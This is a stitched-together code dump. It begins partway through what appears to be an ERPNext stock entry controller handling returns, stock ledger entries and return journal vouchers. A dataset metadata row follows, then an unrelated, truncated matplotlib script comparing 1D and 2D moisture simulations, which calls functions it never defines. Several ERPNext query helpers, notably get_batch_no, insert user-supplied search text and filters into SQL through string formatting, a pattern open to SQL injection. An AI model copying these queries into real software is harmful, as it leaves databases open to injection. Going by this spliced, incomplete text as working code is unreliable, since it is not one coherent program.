incoming_rate = self.get_incoming_rate_for_sales_return(args)
else:
incoming_rate = get_incoming_rate(args)
return incoming_rate
def get_incoming_rate_for_sales_return(self, args):
incoming_rate = 0.0
if (self.delivery_note_no or self.sales_invoice_no) and args.get("item_code"):
incoming_rate = frappe.db.sql("""select abs(ifnull(stock_value_difference, 0) / actual_qty)
from `tabStock Ledger Entry`
where voucher_type = %s and voucher_no = %s and item_code = %s limit 1""",
((self.delivery_note_no and "Delivery Note" or "Sales Invoice"),
self.delivery_note_no or self.sales_invoice_no, args.item_code))
incoming_rate = incoming_rate[0][0] if incoming_rate else 0.0
return incoming_rate
def validate_incoming_rate(self):
for d in self.get('mtn_details'):
if d.t_warehouse:
self.validate_value("incoming_rate", ">", 0, d, raise_exception=IncorrectValuationRateError)
def validate_bom(self):
for d in self.get('mtn_details'):
if d.bom_no and not frappe.db.sql("""select name from `tabBOM`
where item = %s and name = %s and docstatus = 1 and is_active = 1""",
(d.item_code, d.bom_no)):
frappe.throw(_("BOM {0} is not submitted or inactive BOM for Item {1}").format(d.bom_no, d.item_code))
def validate_finished_goods(self):
"""validation: finished good quantity should be same as manufacturing quantity"""
for d in self.get('mtn_details'):
if d.bom_no and flt(d.transfer_qty) != flt(self.fg_completed_qty):
frappe.throw(_("Quantity in row {0} ({1}) must be same as manufactured quantity {2}").format(d.idx, d.transfer_qty, self.fg_completed_qty))
def validate_return_reference_doc(self):
"""validate item with reference doc"""
ref = get_return_doc_and_details(self)
if ref.doc:
# validate docstatus
if ref.doc.docstatus != 1:
frappe.throw(_("{0} {1} must be submitted").format(ref.doc.doctype, ref.doc.name),
frappe.InvalidStatusError)
# update stock check
if ref.doc.doctype == "Sales Invoice" and cint(ref.doc.update_stock) != 1:
frappe.throw(_("'Update Stock' for Sales Invoice {0} must be set").format(ref.doc.name), NotUpdateStockError)
# posting date check
ref_posting_datetime = "%s %s" % (cstr(ref.doc.posting_date),
cstr(ref.doc.posting_time) or "00:00:00")
this_posting_datetime = "%s %s" % (cstr(self.posting_date),
cstr(self.posting_time))
if this_posting_datetime < ref_posting_datetime:
from frappe.utils.dateutils import datetime_in_user_format
frappe.throw(_("Posting timestamp must be after {0}").format(datetime_in_user_format(ref_posting_datetime)))
stock_items = get_stock_items_for_return(ref.doc, ref.parentfields)
already_returned_item_qty = self.get_already_returned_item_qty(ref.fieldname)
for item in self.get("mtn_details"):
# validate if item exists in the ref doc and that it is a stock item
if item.item_code not in stock_items:
frappe.throw(_("Item {0} does not exist in {1} {2}").format(item.item_code, ref.doc.doctype, ref.doc.name),
frappe.DoesNotExistError)
# validate quantity <= ref item's qty - qty already returned
if self.purpose == "Purchase Return":
ref_item_qty = sum([flt(d.qty)*flt(d.conversion_factor) for d in ref.doc.get({"item_code": item.item_code})])
elif self.purpose == "Sales Return":
ref_item_qty = sum([flt(d.qty) for d in ref.doc.get({"item_code": item.item_code})])
returnable_qty = ref_item_qty - flt(already_returned_item_qty.get(item.item_code))
if not returnable_qty:
frappe.throw(_("Item {0} has already been returned").format(item.item_code), StockOverReturnError)
elif item.transfer_qty > returnable_qty:
frappe.throw(_("Cannot return more than {0} for Item {1}").format(returnable_qty, item.item_code),
StockOverReturnError)
def get_already_returned_item_qty(self, ref_fieldname):
return dict(frappe.db.sql("""select item_code, sum(transfer_qty) as qty
from `tabStock Entry Detail` where parent in (
select name from `tabStock Entry` where `%s`=%s and docstatus=1)
group by item_code""" % (ref_fieldname, "%s"), (self.get(ref_fieldname),)))
def update_stock_ledger(self):
sl_entries = []
for d in self.get('mtn_details'):
if cstr(d.s_warehouse) and self.docstatus == 1:
sl_entries.append(self.get_sl_entries(d, {
"warehouse": cstr(d.s_warehouse),
"actual_qty": -flt(d.transfer_qty),
"incoming_rate": 0
}))
if cstr(d.t_warehouse):
sl_entries.append(self.get_sl_entries(d, {
"warehouse": cstr(d.t_warehouse),
"actual_qty": flt(d.transfer_qty),
"incoming_rate": flt(d.incoming_rate)
}))
# On cancellation, make stock ledger entry for
# target warehouse first, to update serial no values properly
if cstr(d.s_warehouse) and self.docstatus == 2:
sl_entries.append(self.get_sl_entries(d, {
"warehouse": cstr(d.s_warehouse),
"actual_qty": -flt(d.transfer_qty),
"incoming_rate": 0
}))
self.make_sl_entries(sl_entries, self.amended_from and 'Yes' or 'No')
def update_production_order(self):
def _validate_production_order(pro_doc):
if flt(pro_doc.docstatus) != 1:
frappe.throw(_("Production Order {0} must be submitted").format(self.production_order))
if pro_doc.status == 'Stopped':
frappe.throw(_("Transaction not allowed against stopped Production Order {0}").format(self.production_order))
if self.production_order:
pro_doc = frappe.get_doc("Production Order", self.production_order)
_validate_production_order(pro_doc)
pro_doc.run_method("update_status")
if self.purpose == "Manufacture/Repack":
pro_doc.run_method("update_produced_qty")
self.update_planned_qty(pro_doc)
def update_planned_qty(self, pro_doc):
from erpnext.stock.utils import update_bin
update_bin({
"item_code": pro_doc.production_item,
"warehouse": pro_doc.fg_warehouse,
"posting_date": self.posting_date,
"planned_qty": (self.docstatus==1 and -1 or 1 ) * flt(self.fg_completed_qty)
})
def get_item_details(self, args):
item = frappe.db.sql("""select stock_uom, description, item_name,
expense_account, buying_cost_center from `tabItem`
where name = %s and (ifnull(end_of_life,'0000-00-00')='0000-00-00' or end_of_life > now())""",
(args.get('item_code')), as_dict = 1)
if not item:
frappe.throw(_("Item {0} is not active or end of life has been reached").format(args.get("item_code")))
ret = {
'uom' : item and item[0]['stock_uom'] or '',
'stock_uom' : item and item[0]['stock_uom'] or '',
'description' : item and item[0]['description'] or '',
'item_name' : item and item[0]['item_name'] or '',
'expense_account' : args.get("expense_account") \
or frappe.db.get_value("Company", args.get("company"), "stock_adjustment_account"),
'cost_center' : item and item[0]['buying_cost_center'] or args.get("cost_center"),
'qty' : 0,
'transfer_qty' : 0,
'conversion_factor' : 1,
'batch_no' : '',
'actual_qty' : 0,
'incoming_rate' : 0
}
stock_and_rate = args.get('warehouse') and self.get_warehouse_details(args) or {}
ret.update(stock_and_rate)
return ret
def get_uom_details(self, args):
conversion_factor = frappe.db.get_value("UOM Conversion Detail", {"parent": args.get("item_code"),
"uom": args.get("uom")}, "conversion_factor")
if not conversion_factor:
frappe.msgprint(_("UOM coversion factor required for UOM: {0} in Item: {1}")
.format(args.get("uom"), args.get("item_code")))
ret = {'uom' : ''}
else:
ret = {
'conversion_factor' : flt(conversion_factor),
'transfer_qty' : flt(args.get("qty")) * flt(conversion_factor)
}
return ret
def get_warehouse_details(self, args):
ret = {}
if args.get('warehouse') and args.get('item_code'):
args.update({
"posting_date": self.posting_date,
"posting_time": self.posting_time,
})
args = frappe._dict(args)
ret = {
"actual_qty" : get_previous_sle(args).get("qty_after_transaction") or 0,
"incoming_rate" : self.get_incoming_rate(args)
}
return ret
def get_items(self):
self.set('mtn_details', [])
pro_obj = None
if self.production_order:
# common validations
pro_obj = frappe.get_doc('Production Order', self.production_order)
if pro_obj:
self.validate_production_order(pro_obj)
self.bom_no = pro_obj.bom_no
else:
# invalid production order
self.production_order = None
if self.bom_no:
if self.purpose in ["Material Issue", "Material Transfer", "Manufacture/Repack",
"Subcontract"]:
if self.production_order and self.purpose == "Material Transfer":
item_dict = self.get_pending_raw_materials(pro_obj)
else:
if not self.fg_completed_qty:
frappe.throw(_("Manufacturing Quantity is mandatory"))
item_dict = self.get_bom_raw_materials(self.fg_completed_qty)
for item in item_dict.values():
if pro_obj:
item["from_warehouse"] = pro_obj.wip_warehouse
item["to_warehouse"] = ""
# add raw materials to Stock Entry Detail table
self.add_to_stock_entry_detail(item_dict)
# add finished good item to Stock Entry Detail table -- along with bom_no
if self.production_order and self.purpose == "Manufacture/Repack":
item = frappe.db.get_value("Item", pro_obj.production_item, ["item_name",
"description", "stock_uom", "expense_account", "buying_cost_center"], as_dict=1)
self.add_to_stock_entry_detail({
cstr(pro_obj.production_item): {
"to_warehouse": pro_obj.fg_warehouse,
"from_warehouse": "",
"qty": self.fg_completed_qty,
"item_name": item.item_name,
"description": item.description,
"stock_uom": item.stock_uom,
"expense_account": item.expense_account,
"cost_center": item.buying_cost_center,
}
}, bom_no=pro_obj.bom_no)
elif self.purpose in ["Material Receipt", "Manufacture/Repack"]:
if self.purpose=="Material Receipt":
self.from_warehouse = ""
item = frappe.db.sql("""select name, item_name, description,
stock_uom, expense_account, buying_cost_center from `tabItem`
where name=(select item from tabBOM where name=%s)""",
self.bom_no, as_dict=1)
self.add_to_stock_entry_detail({
item[0]["name"] : {
"qty": self.fg_completed_qty,
"item_name": item[0].item_name,
"description": item[0]["description"],
"stock_uom": item[0]["stock_uom"],
"from_warehouse": "",
"expense_account": item[0].expense_account,
"cost_center": item[0].buying_cost_center,
}
}, bom_no=self.bom_no)
self.get_stock_and_rate()
def get_bom_raw_materials(self, qty):
from erpnext.manufacturing.doctype.bom.bom import get_bom_items_as_dict
# item dict = { item_code: {qty, description, stock_uom} }
item_dict = get_bom_items_as_dict(self.bom_no, qty=qty, fetch_exploded = self.use_multi_level_bom)
for item in item_dict.values():
item.from_warehouse = item.default_warehouse
return item_dict
def get_pending_raw_materials(self, pro_obj):
"""
issue (item quantity) that is pending to issue or desire to transfer,
whichever is less
"""
item_dict = self.get_bom_raw_materials(1)
issued_item_qty = self.get_issued_qty()
max_qty = flt(pro_obj.qty)
only_pending_fetched = []
for item in item_dict:
pending_to_issue = (max_qty * item_dict[item]["qty"]) - issued_item_qty.get(item, 0)
desire_to_transfer = flt(self.fg_completed_qty) * item_dict[item]["qty"]
if desire_to_transfer <= pending_to_issue:
item_dict[item]["qty"] = desire_to_transfer
else:
item_dict[item]["qty"] = pending_to_issue
if pending_to_issue:
only_pending_fetched.append(item)
# delete items with 0 qty
for item in item_dict.keys():
if not item_dict[item]["qty"]:
del item_dict[item]
# show some message
if not len(item_dict):
frappe.msgprint(_("""All items have already been transferred for this Production Order."""))
elif only_pending_fetched:
frappe.msgprint(_("Pending Items {0} updated").format(only_pending_fetched))
return item_dict
def get_issued_qty(self):
issued_item_qty = {}
result = frappe.db.sql("""select t1.item_code, sum(t1.qty)
from `tabStock Entry Detail` t1, `tabStock Entry` t2
where t1.parent = t2.name and t2.production_order = %s and t2.docstatus = 1
and t2.purpose = 'Material Transfer'
group by t1.item_code""", self.production_order)
for t in result:
issued_item_qty[t[0]] = flt(t[1])
return issued_item_qty
def add_to_stock_entry_detail(self, item_dict, bom_no=None):
expense_account, cost_center = frappe.db.get_values("Company", self.company, \
["default_expense_account", "cost_center"])[0]
for d in item_dict:
se_child = self.append('mtn_details')
se_child.s_warehouse = item_dict[d].get("from_warehouse", self.from_warehouse)
se_child.t_warehouse = item_dict[d].get("to_warehouse", self.to_warehouse)
se_child.item_code = cstr(d)
se_child.item_name = item_dict[d]["item_name"]
se_child.description = item_dict[d]["description"]
se_child.uom = item_dict[d]["stock_uom"]
se_child.stock_uom = item_dict[d]["stock_uom"]
se_child.qty = flt(item_dict[d]["qty"])
se_child.expense_account = item_dict[d]["expense_account"] or expense_account
se_child.cost_center = item_dict[d]["cost_center"] or cost_center
# in stock uom
se_child.transfer_qty = flt(item_dict[d]["qty"])
se_child.conversion_factor = 1.00
# to be assigned for finished item
se_child.bom_no = bom_no
def validate_with_material_request(self):
for item in self.get("mtn_details"):
if item.material_request:
mreq_item = frappe.db.get_value("Material Request Item",
{"name": item.material_request_item, "parent": item.material_request},
["item_code", "warehouse", "idx"], as_dict=True)
if mreq_item.item_code != item.item_code or mreq_item.warehouse != item.t_warehouse:
frappe.throw(_("Item or Warehouse for row {0} does not match Material Request").format(item.idx),
frappe.MappingMismatchError)
def get_work_orderDetails(self, work_order):
WO_details = frappe.db.get_value('Work Order', work_order, '*', as_dict=1, debug=1)
if WO_details:
return {
'sales_invoice_no' : WO_details.sales_invoice_no,
'customer_name' : WO_details.customer_name,
'trial_date' : WO_details.trial_date,
'delivery_date' : WO_details.delivery_date,
'trials' : WO_details.trial_no
}
else:
return None
@frappe.whitelist()
def get_party_details(ref_dt, ref_dn):
if ref_dt in ["Delivery Note", "Sales Invoice"]:
res = frappe.db.get_value(ref_dt, ref_dn,
["customer", "customer_name", "address_display as customer_address"], as_dict=1)
else:
res = frappe.db.get_value(ref_dt, ref_dn,
["supplier", "supplier_name", "address_display as supplier_address"], as_dict=1)
return res or {}
@frappe.whitelist()
def get_production_order_details(production_order):
result = frappe.db.sql("""select bom_no,
ifnull(qty, 0) - ifnull(produced_qty, 0) as fg_completed_qty, use_multi_level_bom,
wip_warehouse from `tabProduction Order` where name = %s""", production_order, as_dict=1)
return result and result[0] or {}
def query_sales_return_doc(doctype, txt, searchfield, start, page_len, filters):
conditions = ""
if doctype == "Sales Invoice":
conditions = "and update_stock=1"
return frappe.db.sql("""select name, customer, customer_name
from `tab%s` where docstatus = 1
and (`%s` like %%(txt)s
or `customer` like %%(txt)s) %s %s
order by name, customer, customer_name
limit %s""" % (doctype, searchfield, conditions,
get_match_cond(doctype), "%(start)s, %(page_len)s"),
{"txt": "%%%s%%" % txt, "start": start, "page_len": page_len},
as_list=True)
def query_purchase_return_doc(doctype, txt, searchfield, start, page_len, filters):
return frappe.db.sql("""select name, supplier, supplier_name
from `tab%s` where docstatus = 1
and (`%s` like %%(txt)s
or `supplier` like %%(txt)s) %s
order by name, supplier, supplier_name
limit %s""" % (doctype, searchfield, get_match_cond(doctype),
"%(start)s, %(page_len)s"), {"txt": "%%%s%%" % txt, "start":
start, "page_len": page_len}, as_list=True)
def query_return_item(doctype, txt, searchfield, start, page_len, filters):
txt = txt.replace("%", "")
ref = get_return_doc_and_details(filters)
stock_items = get_stock_items_for_return(ref.doc, ref.parentfields)
result = []
for item in ref.doc.get_all_children():
if getattr(item, "item_code", None) in stock_items:
item.item_name = cstr(item.item_name)
item.description = cstr(item.description)
if (txt in item.item_code) or (txt in item.item_name) or (txt in item.description):
val = [
item.item_code,
(len(item.item_name) > 40) and (item.item_name[:40] + "...") or item.item_name,
(len(item.description) > 40) and (item.description[:40] + "...") or \
item.description
]
if val not in result:
result.append(val)
return result[start:start+page_len]
def get_batch_no(doctype, txt, searchfield, start, page_len, filters):
if not filters.get("posting_date"):
filters["posting_date"] = nowdate()
batch_nos = None
args = {
'item_code': filters.get("item_code"),
's_warehouse': filters.get('s_warehouse'),
'posting_date': filters.get('posting_date'),
'txt': "%%%s%%" % txt,
'mcond':get_match_cond(doctype),
"start": start,
"page_len": page_len
}
if filters.get("s_warehouse"):
batch_nos = frappe.db.sql("""select batch_no
from `tabStock Ledger Entry` sle
where item_code = '%(item_code)s'
and warehouse = '%(s_warehouse)s'
and batch_no like '%(txt)s'
and exists(select * from `tabBatch`
where name = sle.batch_no
and (ifnull(expiry_date, '2099-12-31') >= %(posting_date)s
or expiry_date = '')
and docstatus != 2)
%(mcond)s
group by batch_no having sum(actual_qty) > 0
order by batch_no desc
limit %(start)s, %(page_len)s """
% args)
if batch_nos:
return batch_nos
else:
return frappe.db.sql("""select name from `tabBatch`
where item = '%(item_code)s'
and docstatus < 2
and (ifnull(expiry_date, '2099-12-31') >= %(posting_date)s
or expiry_date = '' or expiry_date = "0000-00-00")
%(mcond)s
order by name desc
limit %(start)s, %(page_len)s
""" % args)
def get_stock_items_for_return(ref_doc, parentfields):
"""return item codes filtered from doc, which are stock items"""
if isinstance(parentfields, basestring):
parentfields = [parentfields]
all_items = list(set([d.item_code for d in
ref_doc.get_all_children() if d.get("item_code")]))
stock_items = frappe.db.sql_list("""select name from `tabItem`
where is_stock_item='Yes' and name in (%s)""" % (", ".join(["%s"] * len(all_items))),
tuple(all_items))
return stock_items
def get_return_doc_and_details(args):
ref = frappe._dict()
# get ref_doc
if args.get("purpose") in return_map:
for fieldname, val in return_map[args.get("purpose")].items():
if args.get(fieldname):
ref.fieldname = fieldname
ref.doc = frappe.get_doc(val[0], args.get(fieldname))
ref.parentfields = val[1]
break
return ref
return_map = {
"Sales Return": {
# [Ref DocType, [Item tables' parentfields]]
"delivery_note_no": ["Delivery Note", ["delivery_note_details", "packing_details"]],
"sales_invoice_no": ["Sales Invoice", ["entries", "packing_details"]]
},
"Purchase Return": {
"purchase_receipt_no": ["Purchase Receipt", ["purchase_receipt_details"]]
}
}
@frappe.whitelist()
def make_return_jv(stock_entry):
se = frappe.get_doc("Stock Entry", stock_entry)
if not se.purpose in ["Sales Return", "Purchase Return"]:
return
ref = get_return_doc_and_details(se)
if ref.doc.doctype == "Delivery Note":
result = make_return_jv_from_delivery_note(se, ref)
elif ref.doc.doctype == "Sales Invoice":
result = make_return_jv_from_sales_invoice(se, ref)
elif ref.doc.doctype == "Purchase Receipt":
result = make_return_jv_from_purchase_receipt(se, ref)
# create jv doc and fetch balance for each unique row item
jv = frappe.new_doc("Journal Voucher")
jv.update({
"posting_date": se.posting_date,
"voucher_type": se.purpose == "Sales Return" and "Credit Note" or "Debit Note",
"fiscal_year": se.fiscal_year,
"company": se.company
})
from erpnext.accounts.utils import get_balance_on
for r in result:
jv.append("entries", {
"account": r.get("account"),
"against_invoice": r.get("against_invoice"),
"against_voucher": r.get("against_voucher"),
"balance": get_balance_on(r.get("account"), se.posting_date) if r.get("account") else 0
})
return jv
def make_return_jv_from_sales_invoice(se, ref):
# customer account entry
parent = {
"account": ref.doc.debit_to,
"against_invoice": ref.doc.name,
}
# income account entries
children = []
for se_item in se.get("mtn_details"):
# find item in ref.doc
ref_item = ref.doc.get({"item_code": se_item.item_code})[0]
account = get_sales_account_from_item(ref.doc, ref_item)
if account not in children:
children.append(account)
return [parent] + [{"account": account} for account in children]
def get_sales_account_from_item(doc, ref_item):
account = None
if not getattr(ref_item, "income_account", None):
if ref_item.parent_item:
parent_item = doc.get(doc.fname, {"item_code": ref_item.parent_item})[0]
account = parent_item.income_account
else:
account = ref_item.income_account
return account
def make_return_jv_from_delivery_note(se, ref):
invoices_against_delivery = get_invoice_list("Sales Invoice Item", "delivery_note",
ref.doc.name)
if not invoices_against_delivery:
sales_orders_against_delivery = [d.against_sales_order for d in ref.doc.get_all_children() if getattr(d, "against_sales_order", None)]
if sales_orders_against_delivery:
invoices_against_delivery = get_invoice_list("Sales Invoice Item", "sales_order",
sales_orders_against_delivery)
if not invoices_against_delivery:
return []
packing_item_parent_map = dict([[d.item_code, d.parent_item] for d in ref.doc.get(ref.parentfields[1])])
parent = {}
children = []
for se_item in se.get("mtn_details"):
for sales_invoice in invoices_against_delivery:
si = frappe.get_doc("Sales Invoice", sales_invoice)
if se_item.item_code in packing_item_parent_map:
ref_item = si.get({"item_code": packing_item_parent_map[se_item.item_code]})
else:
ref_item = si.get({"item_code": se_item.item_code})
if not ref_item:
continue
ref_item = ref_item[0]
account = get_sales_account_from_item(si, ref_item)
if account not in children:
children.append(account)
if not parent:
parent = {"account": si.debit_to}
break
if len(invoices_against_delivery) == 1:
parent["against_invoice"] = invoices_against_delivery[0]
result = [parent] + [{"account": account} for account in children]
return result
def get_invoice_list(doctype, link_field, value):
if isinstance(value, basestring):
value = [value]
return frappe.db.sql_list("""select distinct parent from `tab%s`
where docstatus = 1 and `%s` in (%s)""" % (doctype, link_field,
", ".join(["%s"]*len(value))), tuple(value))
def make_return_jv_from_purchase_receipt(se, ref):
invoice_against_receipt = get_invoice_list("Purchase Invoice Item", "purchase_receipt",
ref.doc.name)
if not invoice_against_receipt:
purchase_orders_against_receipt = [d.prevdoc_docname for d in
ref.doc.get(ref.doc.fname, {"prevdoc_doctype": "Purchase Order"})
if getattr(d, "prevdoc_docname", None)]
if purchase_orders_against_receipt:
invoice_against_receipt = get_invoice_list("Purchase Invoice Item", "purchase_order",
purchase_orders_against_receipt)
if not invoice_against_receipt:
return []
parent = {}
children = []
for se_item in se.get("mtn_details"):
for purchase_invoice in invoice_against_receipt:
pi = frappe.get_doc("Purchase Invoice", purchase_invoice)
ref_item = pi.get({"item_code": se_item.item_code})
if not ref_item:
continue
ref_item = ref_item[0]
account = ref_item.expense_account
if account not in children:
children.append(account)
if not parent:
parent = {"account": pi.credit_to}
break
if len(invoice_against_receipt) == 1:
parent["against_voucher"] = invoice_against_receipt[0]
result = [parent] + [{"account": account} for account in children]
return result
|
agpl-3.0
| 3,160,072,189,511,768,600
| 35.210251
| 143
| 0.676546
| false
| 3.015681
| false
| false
| false
|
thp44/delphin_6_automation
|
data_process/2d_1d/archieve/moisture_content_comparison.py
|
1
|
18274
|
__author__ = "Christian Kongsgaard"
__license__ = 'MIT'
# -------------------------------------------------------------------------------------------------------------------- #
# IMPORTS
# Modules
import pandas as pd
import matplotlib.pyplot as plt
# RiBuild Modules
# -------------------------------------------------------------------------------------------------------------------- #
# RIBuild
out_folder = r'C:\Users\ocni\PycharmProjects\delphin_6_automation\data_process\2d_1d\processed_data'
graphic_folder = r'U:\RIBuild\2D_1D\Processed Results\4A'
hdf_file = out_folder + '/relative_moisture_content.h5'
# Open HDF
# Uninsulated
dresdenzp_highratio_uninsulated_4a = pd.read_hdf(hdf_file, 'dresden_zp_high_ratio_uninsulated_4a')
dresdenzd_highratio_uninsulated_4a = pd.read_hdf(hdf_file, 'dresden_zd_high_ratio_uninsulated_4a')
postdam_highratio_uninsulated_4a = pd.read_hdf(hdf_file, 'potsdam_high_ratio_uninsulated_4a')
dresdenzp_lowratio_uninsulated_4a = pd.read_hdf(hdf_file, 'dresden_zp_low_ratio_uninsulated_4a')
dresdenzd_lowratio_uninsulated_4a = pd.read_hdf(hdf_file, 'dresden_zd_low_ratio_uninsulated_4a')
postdam_lowratio_uninsulated_4a = pd.read_hdf(hdf_file, 'potsdam_low_ratio_uninsulated_4a')
total_uninsulated_4a = pd.concat([dresdenzp_highratio_uninsulated_4a, dresdenzd_highratio_uninsulated_4a,
postdam_highratio_uninsulated_4a, dresdenzp_lowratio_uninsulated_4a,
dresdenzd_lowratio_uninsulated_4a, postdam_lowratio_uninsulated_4a])
# Insulated
dresdenzp_highratio_insulated_4a = pd.read_hdf(hdf_file, 'dresden_zp_high_ratio_insulated_4a')
dresdenzd_highratio_insulated_4a = pd.read_hdf(hdf_file, 'dresden_zd_high_ratio_insulated_4a')
postdam_highratio_insulated_4a = pd.read_hdf(hdf_file, 'potsdam_high_ratio_insulated_4a')
dresdenzp_lowratio_insulated_4a = pd.read_hdf(hdf_file, 'dresden_zp_low_ratio_insulated_4a')
dresdenzd_lowratio_insulated_4a = pd.read_hdf(hdf_file, 'dresden_zd_low_ratio_insulated_4a')
postdam_lowratio_insulated_4a = pd.read_hdf(hdf_file, 'potsdam_low_ratio_insulated_4a')
total_insulated_4a = pd.concat([dresdenzp_highratio_insulated_4a, dresdenzd_highratio_insulated_4a,
postdam_highratio_insulated_4a, dresdenzp_lowratio_insulated_4a,
dresdenzd_lowratio_insulated_4a, postdam_lowratio_insulated_4a])
def plots(plot, save=False):
"""
Creates box plots from all the wall scenarios
"""
if plot == 'uninsulated' or plot == 'all':
plt.figure('dresdenzp_highratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True)
dresdenzp_highratio_uninsulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 1100)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Dresden ZP - Mortar: High Cement Ratio - Insulation: None')
if save:
plt.savefig(f"{graphic_folder}/dresdenzp_highratio_uninsulated_4a_moisture")
plt.figure('dresdenzd_highratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True)
dresdenzd_highratio_uninsulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 1100)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Dresden ZD - Mortar: High Cement Ratio - Insulation: None')
if save:
plt.savefig(f"{graphic_folder}/dresdenzd_highratio_uninsulated_4a_moisture")
plt.figure('postdam_highratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True)
postdam_highratio_uninsulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 1100)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Potsdam - Mortar: High Cement Ratio - Insulation: None')
if save:
plt.savefig(f"{graphic_folder}/postdam_highratio_uninsulated_4a_moisture")
plt.figure('dresdenzp_lowratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True)
dresdenzp_lowratio_uninsulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 1100)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Dresden ZP - Mortar: Low Cement Ratio - Insulation: None')
if save:
plt.savefig(f"{graphic_folder}/dresdenzp_lowratio_uninsulated_4a_moisture")
plt.figure('dresdenzd_lowratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True)
dresdenzd_lowratio_uninsulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 1100)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Dresden ZD - Mortar: Low Cement Ratio - Insulation: None')
if save:
plt.savefig(f"{graphic_folder}/dresdenzd_lowratio_uninsulated_4a_moisture")
plt.figure('postdam_lowratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True)
postdam_lowratio_uninsulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 1100)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Potsdam - Mortar: Low Cement Ratio - Insulation: None')
if save:
plt.savefig(f"{graphic_folder}/postdam_lowratio_uninsulated_4a_moisture")
plt.figure('total_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True)
total_uninsulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 1100)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: All - Mortar: All - Insulation: None')
if save:
plt.savefig(f"{graphic_folder}/total_uninsulated_4a_moisture")
if plot == 'insulated' or plot == 'all':
plt.figure('dresdenzp_highratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True)
dresdenzp_highratio_insulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 2000)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Dresden ZP - Mortar: High Cement Ratio - Insulation: Calcium Silicate')
if save:
plt.savefig(f"{graphic_folder}/dresdenzp_highratio_insulated_4a_moisture")
plt.figure('dresdenzd_highratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True)
dresdenzd_highratio_insulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 2000)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Dresden ZD - Mortar: High Cement Ratio - Insulation: Calcium Silicate')
if save:
plt.savefig(f"{graphic_folder}/dresdenzd_highratio_insulated_4a_moisture")
plt.figure('postdam_highratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True)
postdam_highratio_insulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 2000)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Potsdam - Mortar: High Cement Ratio - Insulation: Calcium Silicate')
if save:
plt.savefig(f"{graphic_folder}/postdam_highratio_insulated_4a_moisture")
plt.figure('dresdenzp_lowratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True)
dresdenzp_lowratio_insulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 2000)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Dresden ZP - Mortar: Low Cement Ratio - Insulation: Calcium Silicate')
if save:
plt.savefig(f"{graphic_folder}/dresdenzp_lowratio_insulated_4a_moisture")
plt.figure('dresdenzd_lowratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True)
dresdenzd_lowratio_insulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 2000)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Dresden ZD - Mortar: Low Cement Ratio - Insulation: Calcium Silicate')
if save:
plt.savefig(f"{graphic_folder}/dresdenzd_lowratio_insulated_4a_moisture")
plt.figure('postdam_lowratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True)
postdam_lowratio_insulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 2000)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Potsdam - Mortar: Low Cement Ratio - Insulation: Calcium Silicate')
if save:
plt.savefig(f"{graphic_folder}/postdam_lowratio_insulated_4a_moisture")
plt.figure('total_insulated_4a_moisture', figsize=(16, 8), tight_layout=True)
total_insulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 2000)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: All - Mortar: All - Insulation: Calcium Silicate')
if save:
plt.savefig(f"{graphic_folder}/total_insulated_4a_moisture")
plt.show()
plots('all', False)
def std3_ratio(print_=False, excel=False):
"""Computes ratio of outliers in the data sets. Outliers is here defined as data points deviating with more
the 3 standard deviations from the mean."""
std3_uninsulated_ratio_ = uninsulated()
std3_insulated_ratio_ = insulated()
if print_:
print('Uninsulated')
print(std3_uninsulated_ratio_)
print('')
print('Insulated')
print(std3_insulated_ratio_)
if excel:
writer = pd.ExcelWriter(f'{out_folder}/moisture_std_ratios.xlsx')
std3_uninsulated_ratio_.to_excel(writer, 'Uninsulated')
